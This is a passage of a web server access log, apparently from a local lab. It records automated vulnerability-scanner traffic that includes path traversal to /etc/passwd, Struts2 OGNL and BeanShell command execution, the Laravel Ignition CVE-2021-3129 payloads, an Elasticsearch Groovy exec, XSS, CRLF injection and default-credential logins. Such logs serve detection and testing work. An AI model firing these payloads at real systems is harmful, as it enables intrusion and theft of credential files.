0=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=\x22>'> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.220","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apc/apc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /healthz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"username=admin&password=123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/verify HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"127.0.0.1/login/index", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"{\x0D\x0A \x22name\x22: \x22test\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /website/blog/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22phar://../storage/logs/laravel.log/test.txt\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /BitKeeper/etc/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28297MTzWPaPa3XpON89f9NRZKkN9%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.174","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22lang\x22:\x22groovy\x22,\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getText()\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"\x0D\x0A]>\x0D\x0A\x0D\x0A\x0D\x0Aaaaaa\x0D\x0A&xxe;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Autodiscover/Autodiscover.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"bsh.script=exec(\x22id\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET / HTTP/1.0","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"bsh.script=exec(\x22ipconfig\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"j_username=admin&j_password=12345678&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/ftu/welcome.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plc/webvisu.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anything_here HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0DSet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"j_username=admin&j_password=security&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"action=tie_ajax_search&query[]=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"j_username=system&j_password=password&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adfs/ls/idpinitiatedsignon.aspx 